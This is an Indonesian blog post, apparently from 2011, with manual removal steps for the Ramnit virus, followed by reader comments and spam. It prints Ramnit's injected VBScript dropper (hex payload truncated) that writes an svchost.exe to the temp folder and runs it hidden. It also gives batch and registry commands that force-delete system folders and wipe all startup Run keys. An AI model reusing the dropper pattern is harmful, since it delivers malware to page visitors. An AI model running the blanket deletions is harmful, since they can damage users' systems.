Beranda > KOMPUTER > Menghapus Manual Ramnit

Menghapus Manual Ramnit

Pertolongan pertama pada penyakit ramnit.

1. Jalankan Process explorer dari microsoft, click suspend all svchost.exe (Prosesnya di bawah explorer.exe, bukan yang dibawah services.exe, contoh ) kemudian terminate process tree
2. Disable system restore selama proses pembersihan.
3. Hapus recycler, recycled dan “system volume information” folders, Langkahnya sebagai berikut:
(sebagai contoh nama admin adalah pubercity, root directory di C:, dan data directory di D )

-run cmd.exe,
c:\>rd /s /q “c:\recylcer” [enter]
c:\>cacls “c:\system volume information” /t /e /c /g pubercity:F [enter]
c:\>rd /s /q “c:\system volume information” [enter]
d:\>rd /s /q “recycled” [enter]

4. Buat Ramnit_removal.bat dan Ramnit_removal.reg dan letakkan pada path / folder yang sama. Untuk membuatnya langkahnyasebagai berikut:
Jalankan notepad, copy scripts di bawah dan  save as Ramnit_removal.bat
@echo off
REM “Ini untuk Remove/delete Induk Virus”
del /f /s /q /a “%ProgramFiles%\Microsoft\WaterMark.exe”>Delete_Log.txt
del /f /s /q /a “%ProgramFiles%\Microsoft\DesktopLayer.exe”>>Delete_Log.txt
del /f /s /q /a “%systemroot%\System32\dmlconf.dat”>>Delete_Log.txt

REM “This is for erase another tricky worm files, if it exist”
del /f /s /q /a “%Systemroot%\dmlconf.dat”>>Delete_Log.txt
del /f /s /q /a “%Systemroot%\lssas.exe”>>Delete_Log.txt
del /f /s /q /a “%systemroot%\ExplorerSrv.exe”>>Delete_Log.txt
del /f /s /q /a “%systemroot%\System32\rundll32Srv.exe”>>Delete_Log.txt

del /f /s /q /a “%ProgramFiles%\synaptics\syntp\SynTPEnhSrv.exe”>>Delete_Log.txt
del /f /s /q /a “%UserProfile%\Local-Settings\Application Data\\.exe”>>Delete_Log.txt

REM “Ini untuk mencegah kembalinya virus”
mkdir “%ProgramFiles%\Microsoft\WaterMark.exe”
attrib +r +s -h -a “%ProgramFiles%\Microsoft\WaterMark.exe” /s /d
mkdir “%ProgramFiles%\Microsoft\DesktopLayer.exe”
attrib +r +s -h -a “%ProgramFiles%\Microsoft\DesktopLayer.exe” /s /d
mkdir “%systemroot%\System32\dmlconf.dat”
attrib +r +s -h -a “%systemroot%\System32\dmlconf.dat” /s /d
REM “Ini untuk mengembalikan registry settings”
reg import Ramnit_removal.reg
exit

Jalankan notepad, copy  script di bawah dan  save as Ramnit_removal.reg

Windows Registry Editor Version 5.00

[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
“Userinit”=”c:\\windows\\system32\\userinit.exe”
[HKEY_CLASSES_ROOT\regfile\shell\open\command]
@=”regedit.exe \”%1\””
[HKEY_CLASSES_ROOT\inffile\shell\open\command]
@=hex(2):22,00,25,00,31,00,22,00,20,00,25,00,2a,00,00,00
[HKEY_CLASSES_ROOT\exefile]
@=”Application”
“EditFlags”=hex:38,07,00,00
“TileInfo”=”prop:FileDescription;Company;FileVersion”
“InfoTip”=”prop:FileDescription;Company;FileVersion;Create;Size”
[HKEY_CLASSES_ROOT\exefile\DefaultIcon]
@=”%1″
[HKEY_CLASSES_ROOT\exefile\shell]
[HKEY_CLASSES_ROOT\exefile\shell\open]
“EditFlags”=hex:00,00,00,00
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@=”\”%1\” %*”
[HKEY_CLASSES_ROOT\exefile\shell\runas]
[HKEY_CLASSES_ROOT\exefile\shell\runas\command]
@=”\”%1\” %*”

5. Jalankan Ramnit_removal.bat, Sempurnakan pembenahan registry dengan smadav atau ccleaner.
6. Restart  dan  masuk safe mode (pada saat masuk boot tekan f8),kemudian scan dengan antivitus update., disarankan menggunakan kaspersky

7. Restart, bersihkan htm dan  html file, ciri-ciri terinfeksi adalah saat file htm dan  html dibuka dengan notepad, di bagian bawah/bottom terlihat script.

<SCRIPT language=”VBScript”><! –
DropFileName = “svchost.exe”
WriteData = “4D5A90000300000004000000FFFF0000B8000000 // very long here…
Set FSO = CreateObject(“Scripting.FileSystemObject”)
DropPath = FSO.GetSpecialFolder(2) & “\” & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng(“&H” & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject(“WScript.Shell”)
WSHshell.Run DropPath, 0
//–>
Silahakan mau dibersihkan manual, atau menggunakan software. Untuk software silahkan memakai tool ini.

8. Selesai.

About these ads
Kategori:KOMPUTER Tag:
  1. 27 April 2011 pukul 15:07

    instal ulah rah wess klo masih ad yang aktif no but kan do delek nang registrii

  2. wiji
    27 April 2011 pukul 15:07

    lagumu marai pusng Pak…. saran saya, lebih baik gak usah dikasih lagu blognya. coz kalo sinyalnya lemah bunyinya gak enak didengar

    @wiji: sekarang sudah bersih…. :D

    @taufik: coba kamu instal ulang bro, pada Komputer yang terkena ramnit ! baca disini dulu ya !

  3. 21 Juni 2011 pukul 15:07

    makasi banyak ya atas infonya itu membantu sekali buat saya

  4. 5 Oktober 2011 pukul 15:07

    GuT maRsoGuD, Top maRkoTop pak Dhe.. Lebih mak Nyuz kLo sTeLahNya Di scaN pke aNtipiRus yg musTajab. waLah kompuTeR LaNgsuNg cLiNkkkk!!!

    TeNgkiu iNpoNya saNgaT beRmumpaNgaT

    sama-sama bro

  5. 16 Mei 2013 pukul 15:07

    I am sure this article has touched all the internet people,
    its really really fastidious article on building up
    new web site.

  6. 8 Juni 2013 pukul 15:07

    After looking into a number of the blog posts on your web site, I honestly appreciate your technique of blogging.
    I bookmarked it to my bookmark website list and will be checking back in the near future.

    Please visit my web site as well and tell me what you think.

  7. 7 September 2014 pukul 15:07

    you’re actually a good webmaster. The web site loading pace is
    amazing. It kind of feels that you’re doing any
    distinctive trick. Moreover, The contents are masterwork.
    you have performed a magnificent process on this subject!

  8. 4 Oktober 2014 pukul 15:07

    I’m not sure why but this blog is loading very slow for
    me. Is anyone else having this problem or is it a issue
    on my end? I’ll check back later on and see if the problem still exists.

  9. 7 Oktober 2014 pukul 15:07

    Hello, Neat post. Theere is a problem togbether with your web site in web explorer, could check this?
    IE nonetheless is the markedt leeader and a big section off people will leave out your wonderful writing due
    to this problem.

  1. No trackbacks yet.

Berikan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Logout / Ubah )

Twitter picture

You are commenting using your Twitter account. Logout / Ubah )

Facebook photo

You are commenting using your Facebook account. Logout / Ubah )

Google+ photo

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

Ikuti

Get every new post delivered to your Inbox.

Bergabunglah dengan 38 pengikut lainnya.

%d blogger menyukai ini: